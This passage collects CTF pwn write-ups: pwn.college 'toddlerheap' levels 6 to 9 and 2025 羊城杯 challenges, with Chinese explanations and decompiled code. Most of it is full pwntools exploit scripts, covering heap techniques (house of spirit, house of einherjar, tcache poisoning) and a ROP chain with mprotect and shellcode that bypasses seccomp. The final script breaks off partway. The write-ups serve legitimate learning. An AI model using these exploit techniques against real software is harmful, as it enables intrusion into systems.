    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx).encode())


def read(idx, size, data):
    target.sendlineafter(b": ", b"read")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())
    target.send(data)


def quit():
    target.sendlineafter(b": ", b"quit")


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    malloc(0, 0x420)
    malloc(1, 0x420)
    malloc(2, 0x420)

    payload = flat(
        0,
        0x420,
        0x404148 - 0x18,
        0x404148 - 0x10,
        0,
        0,
        b"A" * 0x3F0,
        0x420,
        0x431 & ~0x1,
    )
    # raw_input("DEBUG")
    read(1, 0x430, payload)
    free(2)

    payload = flat(
        b"A" * 0x10,
    )
    # raw_input("DEBUG")
    read(1, 0x1337, payload)
    puts(1)

    target.recvuntil(b"Data: " + b"A" * 0x10)
    heap = int.from_bytes(target.recvline().strip(), "little")
    overlapping_chunksize = heap - 0x890
    overlapping_chunk = heap - 0x880
    target.success(f"heap: {hex(heap)}")

    payload = flat(
        0,
        0,
        overlapping_chunksize,
    )
    # raw_input("DEBUG")
    read(1, 0x1337, payload)

    payload = flat(
        0,
        0x881,
    )
    # raw_input("DEBUG")
    read(0, 0x1337, payload)

    payload = flat(
        0,
        0,
        overlapping_chunk,
    )
    # raw_input("DEBUG")
    read(1, 0x1337, payload)
    free(0)

    malloc(5, 0x870)
    # raw_input("DEBUG")
    read(5, 0x1337, flat(b"A" * 0x440))
    puts(5)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Level 6.0

Information

Category: Pwn

Description

Perform an advanced heap exploit to obtain the flag.

Write-up

house of spirit 吧，只要伪造一个 free chunk，就可以让 calloc 返回这个 chunk 的地址了，但是要注意 calloc 会将 chunk 内存清空。

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/toddlerheap_level6.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def calloc(idx, size):
    target.sendlineafter(b": ", b"calloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx).encode())


def safer_read(idx, data):
    target.sendlineafter(b": ", b"safer_read")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.send(data)


def read_to_global(size, data):
    target.sendlineafter(b": ", b"read_to_global")
    target.sendlineafter(b"read_size: ", str(size).encode())
    target.send(data)


def quit():
    target.sendlineafter(b": ", b"quit")


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    target.recvuntil(b"Reading the flag into ")
    flag = int(target.recvline().strip()[:-1], 16)

    for i in range(7):
        calloc(i, 0)
        free(i)

    calloc(0, 0x10)
    calloc(1, 0x10)
    free(1)
    free(0)

    puts(1)
    target.recvuntil(b"Data: ")
    pos = int.from_bytes(target.recvline().strip(), "little")

    puts(0)
    target.recvuntil(b"Data: ")
    heap = demangle(pos, int.from_bytes(target.recvline().strip(), "little"))

    target.success(f"flag: {hex(flag)}")
    target.success(f"pos: {hex(pos)}")
    target.success(f"heap: {hex(heap)}")

    payload = flat(
        {
            0x2E0: 0,
            0x2E8: 0x21,
            0x2F0: b"A" * 0x8,
        }
    )
    # raw_input("DEBUG")
    read_to_global(0x1337, payload)
    # raw_input("DEBUG")
    safer_read(0, flat(mangle(pos, flag - 0x28)))

    calloc(0, 0x18)
    raw_input("DEBUG")
    calloc(1, 0x18)
    raw_input("DEBUG")
    safer_read(1, b"A" * 0x18)
    puts(1)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Level 7.0

Information

Category: Pwn

Description

Perform an advanced heap exploit to obtain the flag.

Write-up

与上题类似，也是要想办法令 calloc 返回一个包含 flag 的 chunk，区别在于这次不能往 bss 写入数据了。但是调试发现，bss 保存 size 的位置与保存 flag 的位置距离很近，因此我们也就可以利用这一点来伪造 flag chunk 的 chunk_size，令 calloc 认为这是一个合法的 chunk 并返回。

虽然这次 bss 中存储 size 的位置和 flag 位置距离近看上去很刻意，但 bss 下面一般紧邻着 heap 确实是一个通常容易被忽略的地方，可以注意刻意培养一下自己对内存布局的敏感度：

pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
             Start                End Perm     Size Offset File (set vmmap-prefer-relpaths on)
    0x557a0689e000     0x557a0689f000 r--p     1000      0 toddlerheap_level7.0_patched
    0x557a0689f000     0x557a068a0000 r-xp     1000   1000 toddlerheap_level7.0_patched
    0x557a068a0000     0x557a068a1000 r--p     1000   2000 toddlerheap_level7.0_patched
    0x557a068a1000     0x557a068a2000 r--p     1000   2000 toddlerheap_level7.0_patched
    0x557a068a2000     0x557a068a3000 rw-p     1000   3000 toddlerheap_level7.0_patched
    0x557a068a3000     0x557a068a7000 rw-p     4000   5000 toddlerheap_level7.0_patched
    0x557a3c52b000     0x557a3c54c000 rw-p    21000      0 [heap]

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/toddlerheap_level7.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def calloc(idx, size):
    target.sendlineafter(b": ", b"calloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx).encode())


def safer_read(idx, data):
    target.sendlineafter(b": ", b"safer_read")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.send(data)


def quit():
    target.sendlineafter(b": ", b"quit")


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    target.recvuntil(b"Reading the flag into ")
    flag = int(target.recvline().strip()[:-1], 16)

    for i in range(7):
        calloc(i, 0)
        free(i)

    calloc(0, 0)
    calloc(1, 0)
    free(1)
    free(0)

    puts(1)
    target.recvuntil(b"Data: ")
    pos = int.from_bytes(target.recvline().strip(), "little")

    puts(0)
    target.recvuntil(b"Data: ")
    heap = demangle(pos, int.from_bytes(target.recvline().strip(), "little"))

    target.success(f"flag: {hex(flag)}")
    target.success(f"pos: {hex(pos)}")
    target.success(f"heap: {hex(heap)}")

    calloc(10, 0x20)
    calloc(0, 0x10)
    calloc(1, 0x10)
    free(1)
    free(0)

    payload = flat(
        mangle(pos, flag - 0x28),
    )
    raw_input("DEBUG")
    safer_read(0, payload)

    calloc(0, 0x10)
    # raw_input("DEBUG")
    calloc(0, 0x18)

    raw_input("DEBUG")
    safer_read(0, b"A" * 0x18)
    puts(0)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Level 8.0

Information

Category: Pwn

Description

Perform an advanced heap exploit to obtain the flag.

Write-up

本来以为是要打 largebin attack，结果发现不是，而是 house of einherjar……~~einherjar？E (FLAGS) in her jar !（误~~

对于这章都快结束了还没有学到 largebin attack 还是有点小失落的，不过却也为多学了一个 house 而高兴……

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/toddlerheap_level8.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx).encode())


def read_copy(idx, data):
    target.sendlineafter(b": ", b"read_copy")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.send(data)


def read_flag():
    target.sendlineafter(b": ", b"read_flag")


def quit():
    target.sendlineafter(b": ", b"quit")


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    malloc(0, 0)
    malloc(1, 0)
    free(1)
    free(0)
    malloc(0, 0)
    malloc(1, 0)

    puts(1)
    target.recvuntil(b"Data: ")
    pos = int.from_bytes(target.recvline().strip(), "little")

    puts(0)
    target.recvuntil(b"Data: ")
    heap = demangle(pos, int.from_bytes(target.recvline().strip(), "little"))

    target.success(f"pos: {hex(pos)}")
    target.success(f"heap: {hex(heap)}")

    flag = heap + 0x8C0
    fake_chunk = heap + 0x20

    malloc(0, 0x38)
    malloc(1, 0x28)
    malloc(2, 0xF8)

    payload = flat(
        0,
        0x60,
        fake_chunk,
        fake_chunk,
    )
    # raw_input("DEBUG")
    read_copy(0, payload)

    payload = flat(
        b"A" * 0x20,
        0x60,
    )
    # raw_input("DEBUG")
    read_copy(1, payload)

    for i in range(7, 14):
        malloc(i, 0xF8)

    for i in range(7, 14):
        free(i)

    # raw_input("DEBUG")
    free(2)

    malloc(3, 0x158)
    malloc(4, 0x28)
    free(4)
    free(1)

    payload = flat(
        b"A" * 0x20,
        0,
        0x31,
        mangle(pos, flag),
    )
    # raw_input("DEBUG")
    read_copy(3, payload)

    # raw_input("DEBUG")
    malloc(0, 0x28)
    malloc(0, 0x28)
    # raw_input("DEBUG")
    read_flag()
    puts(0)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Level 9.0

Information

Category: Pwn

Description

Perform an advanced heap exploit to obtain the flag.

Write-up

free 后只是清空了 size 却没有清空 ptr，所以可以将 unsorted bin 中的 chunk 丢到 tcache 中，再利用 unsorted bin 的合并机制来 overlapping 破坏 tcache 的 fd 指针。

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/toddlerheap_level9"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx).encode())


def safer_read(idx, data):
    target.sendlineafter(b": ", b"safer_read")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.send(data)


def send_flag():
    target.sendlineafter(b": ", b"send_flag")


def quit():
    target.sendlineafter(b": ", b"quit")


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    authenticated = 0x404260

    malloc(0, 0x10)
    malloc(1, 0x10)
    free(1)
    free(0)
    malloc(1, 0x10)
    malloc(0, 0x10)

    puts(0)
    target.recvuntil(b"Data: ")
    pos = int.from_bytes(target.recvline().strip(), "little")

    puts(1)
    target.recvuntil(b"Data: ")
    heap = demangle(pos, int.from_bytes(target.recvline().strip(), "little"))

    target.success(f"pos: {hex(pos)}")
    target.success(f"heap: {hex(heap)}")

    for i in range(7, 14):
        malloc(i, 0x100)

    malloc(0, 0x100)
    malloc(1, 0x100)
    malloc(15, 0x10)  # guard

    for i in range(7, 14):
        free(i)

    free(1)
    free(0)

    malloc(0, 0x100)
    free(1)

    malloc(0, 0x210)
    payload = flat(
        {
            0x108: 0x111,
            0x110: mangle(pos, authenticated),
        }
    )
    # raw_input("DEBUG")
    safer_read(0, payload)

    malloc(0, 0x100)
    malloc(0, 0x100)
    safer_read(0, b"A")
    send_flag()
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Write-ups: 2025 年「羊城杯」网络安全大赛初赛 [本科院校组]

Sat, 11 Oct 2025 00:00:00 GMT

stack

Information

Category: Pwn
Points: 500

Description

听说你很喜欢栈溢出？

Write-up

虽然逻辑很简单，但是还是先让 MCP 先分析一下逻辑，重命名一下变量名。得到如下程序：

__int64 init()
{
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stderr, 0, 2, 0);
  *(_QWORD *)&random_seed = time(0);
  srand(random_seed);
  for ( n2 = 0; n2 <= 2; n2 = rand() % 5 )
    ;
  main_addr_multiplied = (_QWORD)main * n2;
  global_buffer = malloc(0x1000u);
  sub_1396();
  memset(global_buffer, 0, 0x2000u);
  global_buffer = (char *)global_buffer - 672;
  buffer_ptr_offset = (__int64)global_buffer + 256;
  *((_QWORD *)global_buffer + 32) = (char *)global_buffer + 4096;
  *(_QWORD *)(buffer_ptr_offset + 8) = sub_132E;
  counter_n2 = 0;
  return 0;
}

上面这个 init 函数里的 sub_1396 开了沙箱，禁用了 open 和 execve，第一反应是打 orw 。可以用 openat 代替 open，然后 sendfile 可以 read，write 一把梭。

PS: 一开始我还注意到程序有 syscall gadget，结合 read 我觉得打 SROP 也可以，不过想着可能还需要栈迁移？好久没做过 SROP 了不知道行不行，就用上面那个看上去更稳妥的办法了。

__int64 vuln()
{
  puts("Welcome to YCB2025!");
  puts("Good luck!");
  read(0, global_buffer, 0x2000u);
  if ( (unsigned __int64)counter_n2 > 2 )
  {
    puts("Bye~");
    exit(0);
  }
  ++counter_n2;
  return 0;
}

下面有个后门函数，MCP 重命名了变量名叫 main_addr_multiplied，盲猜这个地址保存的就是 main 函数地址乘以一个随机数了，可以先返回到这里泄漏出来然后随便除几个数字试试看能不能得到 main 的地址，也可以自己看伪代码，判断一下可能除了什么数，我当时是猜的，因为数字很小，随便试了下就出来了。

// positive sp value has been detected, the output may be wrong!
__int64 sub_1357()
{
  printf("magic number:%lld\n", main_addr_multiplied);
  return vuln();
}

后来研究了一下，发现是在 init 里设置的乘什么数，结果范围是 $[3, 4]$：

  for ( n2 = 0; n2 <= 2; n2 = rand() % 5 )
    ;
  main_addr_multiplied = (_QWORD)main * n2;

由于没有控制 rdi 的 gadgets, 得去看看程序里面有没有可以利用的汇编片段，发现下面这个函数比较奇怪，使用了 stdout 的地址赋值，一般情况下 stdout 里面保存的是 libc 地址。

FILE **sub_12C9()
{
  FILE **result; // rax

  result = (FILE **)qword_4090;
  if ( !qword_4090 )
  {
    qword_4090 = 1;
    p_stdout = (__int64)&stdout;
    return &stdout;
  }
  return result;
}

再看一下它的汇编：

.text:00000000000012C9 ; FILE **sub_12C9()
.text:00000000000012C9 sub_12C9        proc near
.text:00000000000012C9 ; __unwind {
.text:00000000000012C9                 endbr64
.text:00000000000012CD                 sub     rsp, 8
.text:00000000000012D1                 mov     rax, cs:qword_4090
.text:00000000000012D8                 test    rax, rax
.text:00000000000012DB                 jnz     short loc_1329
.text:00000000000012DD                 mov     cs:qword_4090, 1
.text:00000000000012E8                 lea     rax, stdout
.text:00000000000012EF                 mov     cs:p_stdout, rax
.text:00000000000012F6                 mov     rax, cs:p_stdout
.text:00000000000012FD                 lea     rdx, stdout     ; rtld_fini
.text:0000000000001304                 cmp     rax, rdx
.text:0000000000001307                 jnz     short loc_1312
.text:0000000000001309                 mov     rax, cs:p_stdout
.text:0000000000001310                 jmp     short loc_1329
.text:0000000000001312 ; ---------------------------------------------------------------------------
.text:0000000000001312
.text:0000000000001312 loc_1312:                               ; CODE XREF: sub_12C9+3E↑j
.text:0000000000001312                 mov     cs:qword_4090, 0FFFFFFFFFFFFFFFFh
.text:000000000000131D                 call    start
.text:0000000000001322 ; ---------------------------------------------------------------------------
.text:0000000000001322                 mov     eax, 0
.text:0000000000001327                 jmp     short $+2
.text:0000000000001329 ; ---------------------------------------------------------------------------
.text:0000000000001329
.text:0000000000001329 loc_1329:                               ; CODE XREF: sub_12C9+12↑j
.text:0000000000001329                                         ; sub_12C9+47↑j ...
.text:0000000000001329                 add     rsp, 8
.text:000000000000132D                 retn
.text:000000000000132D ; } // starts at 12C9

上面给 rax, rdx 都赋值了 stdout 地址，所以 cmp 不进 jnz，直接返回。

泄漏了这个地址就可以去泄漏 libc 地址了，看到有 puts，那想办法把 rax 里面的值给到 rdi 然后调用 puts 就行。

注意到 puts 的传参是用的 rax，此外，程序有多处 puts 的交叉引用，找一个能用的就行：

.text:000000000000161F ; __int64 vuln()
.text:000000000000161F vuln            proc near               ; CODE XREF: sub_1357+32↑p
.text:000000000000161F                                         ; main+17↓p
.text:000000000000161F ; __unwind {
.text:000000000000161F                 endbr64
.text:0000000000001623                 push    rbp
.text:0000000000001624                 lea     rax, aWelcomeToYcb20 ; "Welcome to YCB2025!"
.text:000000000000162B                 mov     rdi, rax        ; s
.text:000000000000162E                 call    _puts
.text:0000000000001633                 lea     rax, aGoodLuck  ; "Good luck!"
.text:000000000000163A                 mov     rdi, rax        ; s
.text:000000000000163D                 call    _puts
.text:0000000000001642                 mov     rax, cs:global_buffer
.text:0000000000001649                 mov     edx, 2000h      ; nbytes
.text:000000000000164E                 mov     rsi, rax        ; buf
.text:0000000000001651                 mov     edi, 0          ; fd
.text:0000000000001656                 call    _read
.text:000000000000165B                 mov     rax, cs:counter_n2
.text:0000000000001662                 cmp     rax, 2
.text:0000000000001666                 jbe     short loc_1681
.text:0000000000001668                 lea     rax, aBye_0     ; "Bye~"
.text:000000000000166F                 mov     rdi, rax        ; s
.text:0000000000001672                 call    _puts
.text:0000000000001677                 mov     edi, 0          ; status
.text:000000000000167C                 call    _exit

上面这个 puts 执行完还能再执行一次 read，这次构造 mprotect 设置 bss 可执行，然后再来一个 read 把 shellcode 读到 bss，然后返回到 bss 就好了。

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    ROP,
    args,
    asm,
    context,
    flat,
    process,
    raw_input,
    remote,
)

FILE = "./Stack_Over_Flow"
HOST, PORT = "45.40.247.139", 25201

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = ELF("./libc.so.6")


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    payload = flat(
        b"A" * 0x108,
        b"\x5f",
    )
    # raw_input("DEBUG")
    target.sendafter(b"Good luck!", payload)

    target.recvuntil(b"magic number:")
    elf.address = (int(target.recvline().strip()) // 3) - 0x16B0
    target.success(f"pie: {hex(elf.address)}")

    control_rdi = elf.address + 0x12E8
    payload = flat(
        b"A" * 0x108,
        control_rdi,
        0,
        elf.address + 0x162B,  # puts
    )
    # raw_input("DEBUG")
    target.sendafter(b"Good luck!", payload)

    target.recvline()
    libc.address = int.from_bytes(target.recvline().strip(), "little") - 0x21B780
    target.success(f"libc: {hex(libc.address)}")

    rop = ROP(libc)
    payload = flat(
        b"A" * 0x108,
        # mprotect
        libc.address + 0x378DF,  # nop; ret
        libc.address + 0x378DF,  # nop; ret
        rop.rdi.address,
        elf.address + 0x4000,
        rop.rsi.address,
        0x1337,
        rop.find_gadget(["pop rdx", "pop rbx", "ret"])[0],
        0x7,
        0,
        rop.rax.address,
        0xA,
        rop.find_gadget(["syscall", "ret"])[0],
        # read
        rop.rdi.address,
        0,
        rop.rsi.address,
        elf.bss() + 0x500,
        rop.find_gadget(["pop rdx", "pop rbx", "ret"])[0],
        0x1337,
        0,
        rop.rax.address,
        0,
        rop.find_gadget(["syscall", "ret"])[0],
        elf.bss() + 0x500,
    )

    raw_input("DEBUG")
    target.sendafter(b"Good luck!", payload)

    payload = asm("""
        mov rax, 0x67616c66
        push rax
        xor edi, edi
        sub edi, 100
        mov rsi, rsp
        xor edx, edx
        xor r10, r10
        mov eax, 0x101
        syscall

        mov edi, 1
        mov esi, 3
        push 0
        mov rdx, rsp
        mov r10, 0x1337
        mov rax, 0x28
        syscall
    """)
    target.send(payload)

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[DASCTF{86480848618847093058521417023694}]

malloc

Information

Category: Pwn
Points: 500

Description

我再也不做堆了

Write-up

题目实现了自定义的 malloc 和 free，在 create 函数中，可以申请的 chunk_idx 的最大值是 0x10，chunk_pointers 数组只能存储 16 个 QWORD（索引 0-15）。调试发现，当 chunk_idx 为 0x10 时，malloc 会破坏 g_chunk_sizes[0]。

这里简单贴一下几个函数的逆向结果吧：

__int64 init()
{
  int i; // [rsp+4h] [rbp-Ch]
  __int64 seccomp_ctx; // [rsp+8h] [rbp-8h]

  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stderr, 0, 2, 0);
  g_arena_top = (__int64)&g_heap_base;
  g_heap_size_limit = 4096;
  g_current_heap_offset = 4096;
  for ( i = 0; i <= 15; ++i )
    g_freelists[i] = 0;
  seccomp_ctx = seccomp_init(2147418112);
  seccomp_rule_add(seccomp_ctx, 0, 59, 0);
  seccomp_rule_add(seccomp_ctx, 0, 322, 0);
  return seccomp_load(seccomp_ctx);
}

unsigned __int64 create()
{
  unsigned int chunk_idx_1; // ebx
  char newline_char; // [rsp+Fh] [rbp-21h] BYREF
  unsigned int chunk_idx; // [rsp+10h] [rbp-20h] BYREF
  unsigned int chunk_size; // [rsp+14h] [rbp-1Ch] BYREF
  unsigned __int64 canary; // [rsp+18h] [rbp-18h]

  canary = __readfsqword(0x28u);
  puts("Index");
  __isoc99_scanf("%u%c", &chunk_idx, &newline_char);
  if ( chunk_idx <= 0x10
    && (puts("size"), __isoc99_scanf("%u%c", &chunk_size, &newline_char), chunk_size <= 0x70)
    && chunk_size > 0xF )
  {
    chunk_idx_1 = chunk_idx;
    *((_QWORD *)&g_heap_base + chunk_idx_1 + 512) = do_malloc(chunk_size);
    *((_QWORD *)&g_heap_base + chunk_idx + 528) = chunk_size;
    puts("Success");
  }
  else
  {
    puts("Invalid");
  }
  return canary - __readfsqword(0x28u);
}

__int64 __fastcall do_malloc(unsigned int requested_size)
{
  signed int aligned_size; // [rsp+1Ch] [rbp-14h]
  unsigned int remainder_size; // [rsp+20h] [rbp-10h]
  int freelist_idx; // [rsp+24h] [rbp-Ch]
  __int64 allocated_chunk; // [rsp+28h] [rbp-8h]
  __int64 g_arena_top; // [rsp+28h] [rbp-8h]

  remainder_size = requested_size & 0xF;
  if ( remainder_size > 8 )
    aligned_size = requested_size - remainder_size + 32;
  else
    aligned_size = requested_size - remainder_size + 16;
  freelist_idx = aligned_size / 16;
  if ( g_freelists[aligned_size / 16] )
  {
    allocated_chunk = g_freelists[freelist_idx];
    g_freelists[freelist_idx] = *(_QWORD *)(allocated_chunk + 16);
    *(_BYTE *)allocated_chunk = 1;
    return allocated_chunk + 16;
  }
  else
  {
    if ( aligned_size >= (unsigned __int64)g_heap_size_limit )
    {
      puts("malloc(): corrupted top chunks");
      exit(0);
    }
    g_arena_top = g_arena_top;
    *(_BYTE *)g_arena_top = 1;
    *(_DWORD *)(g_arena_top + 8) = aligned_size;
    g_arena_top += aligned_size;
    g_heap_size_limit -= aligned_size;
    *(_DWORD *)(g_arena_top + 8) = g_heap_size_limit;
    return g_arena_top + 16;
  }
}

unsigned __int64 delete()
{
  char newline_char; // [rsp+3h] [rbp-Dh] BYREF
  unsigned int chunk_idx; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 canary; // [rsp+8h] [rbp-8h]

  canary = __readfsqword(0x28u);
  puts("Index");
  __isoc99_scanf("%u%c", &chunk_idx, &newline_char);
  if ( chunk_idx <= 0x10 )
  {
    do_free(chunk_idx);
    *((_QWORD *)&g_heap_base + chunk_idx + 528) = 0;
    puts("Success");
  }
  else
  {
    puts("Invalid index");
  }
  return canary - __readfsqword(0x28u);
}

__int64 __fastcall do_free(unsigned int chunk_idx)
{
  int chunk_size_val; // kr08_4
  __int64 chunk_header_ptr_2; // rax
  int freelist_walk_count; // [rsp+14h] [rbp-1Ch]
  __int64 chunk_header_ptr_1; // [rsp+20h] [rbp-10h]
  _BYTE *chunk_header_ptr; // [rsp+28h] [rbp-8h]

  chunk_header_ptr = (_BYTE *)(*((_QWORD *)&g_heap_base + chunk_idx + 512) - 16LL);
  chunk_size_val = *(_DWORD *)(*((_QWORD *)&g_heap_base + chunk_idx + 512) - 8LL);
  **((_QWORD **)&g_heap_base + chunk_idx + 512) = g_freelists[chunk_size_val / 16];
  g_freelists[chunk_size_val / 16] = chunk_header_ptr;
  *chunk_header_ptr = 0;
  freelist_walk_count = 0;
  chunk_header_ptr_2 = *(_QWORD *)(g_freelists[chunk_size_val / 16] + 16LL);
  chunk_header_ptr_1 = chunk_header_ptr_2;
  while ( freelist_walk_count <= 13 && chunk_header_ptr_1 )
  {
    if ( (_BYTE *)chunk_header_ptr_1 == chunk_header_ptr )
    {
      puts("free(): double free or corruption (fast)");
      exit(0);
    }
    chunk_header_ptr_2 = *(_QWORD *)(chunk_header_ptr_1 + 16);
    chunk_header_ptr_1 = chunk_header_ptr_2;
    ++freelist_walk_count;
  }
  return chunk_header_ptr_2;
}

unsigned __int64 edit()
{
  char newline_char; // [rsp+Fh] [rbp-11h] BYREF
  unsigned int chunk_idx; // [rsp+10h] [rbp-10h] BYREF
  _DWORD nbytes[3]; // [rsp+14h] [rbp-Ch] BYREF

  *(_QWORD *)&nbytes[1] = __readfsqword(0x28u);
  puts("Index");
  __isoc99_scanf("%u%c", &chunk_idx, &newline_char);
  if ( chunk_idx <= 0x10
    && *((_QWORD *)&g_heap_base + chunk_idx + 512)
    && (puts("size"),
        __isoc99_scanf("%u%c", nbytes, &newline_char),
        nbytes[0] <= *((__int64 *)&g_heap_base + chunk_idx + 528)) )
  {
    read(0, *((void **)&g_heap_base + chunk_idx + 512), nbytes[0]);
    puts("Success");
  }
  else
  {
    puts("Invalid");
  }
  return *(_QWORD *)&nbytes[1] - __readfsqword(0x28u);
}

unsigned __int64 show()
{
  char newline_char; // [rsp+3h] [rbp-Dh] BYREF
  unsigned int chunk_idx; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 canary; // [rsp+8h] [rbp-8h]

  canary = __readfsqword(0x28u);
  puts("Index");
  __isoc99_scanf("%u%c", &chunk_idx, &newline_char);
  if ( chunk_idx <= 0x10 && *((_QWORD *)&g_heap_base + chunk_idx + 512) )
  {
    puts(*((const char **)&g_heap_base + chunk_idx + 512));
    puts("Success");
  }
  else
  {
    puts("Invalid index");
  }
  return canary - __readfsqword(0x28u);
}

.data:0000000000004008 ; void *off_4008
.data:0000000000004008 off_4008        dq offset off_4008      ; DATA XREF: sub_1200+1B↑r
.data:0000000000004008                                         ; .data:off_4008↓o
.data:0000000000004010                 align 20h
.data:0000000000004020 g_arena_top     dq 0FFFFFFFFFFFFFFFFh   ; DATA XREF: init+6D↑w
.data:0000000000004020                                         ; init+7F↑r ...
.data:0000000000004028 g_heap_size_limit dq 0FFFFFFFFFFFFFFFFh ; DATA XREF: init+74↑w
.data:0000000000004028                                         ; do_malloc+D1↑r ...
.data:0000000000004030                 align 20h
.data:0000000000004040 ; _QWORD g_freelists[16]
.data:0000000000004040 g_freelists     dq 0FFFFFFFFFFFFFFFFh, 0Fh dup(0)
.data:0000000000004040                                         ; DATA XREF: init+A6↑o
.data:0000000000004040                                         ; do_malloc+56↑o ...
.data:0000000000004040 _data           ends
.data:0000000000004040

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    ROP,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "./pwn_patched"
HOST, PORT = "45.40.247.139", 17742

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = ELF("./libc.so.6")


def menu(option):
    target.recvuntil(b"=======================")
    target.sendline(str(option).encode())


def create(idx, size):
    menu(1)
    target.sendlineafter(b"Index", str(idx).encode())
    target.sendlineafter(b"size", str(size).encode())
    target.recvlines(2)


def delete(idx):
    menu(2)
    target.sendlineafter(b"Index", str(idx).encode())
    target.recvlines(2)


def edit(idx, size, data):
    menu(3)
    target.sendlineafter(b"Index", str(idx).encode())
    target.sendlineafter(b"size", str(size).encode())
    target.sendline(data)


def show(idx):
    menu(4)
    target.sendlineafter(b"Index", str(idx).encode())


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    create(0, 0x70)
    create(1, 0x70)
    delete(1)
    delete(0)

    # raw_input("DEBUG")
    show(0)
    target.recvline()
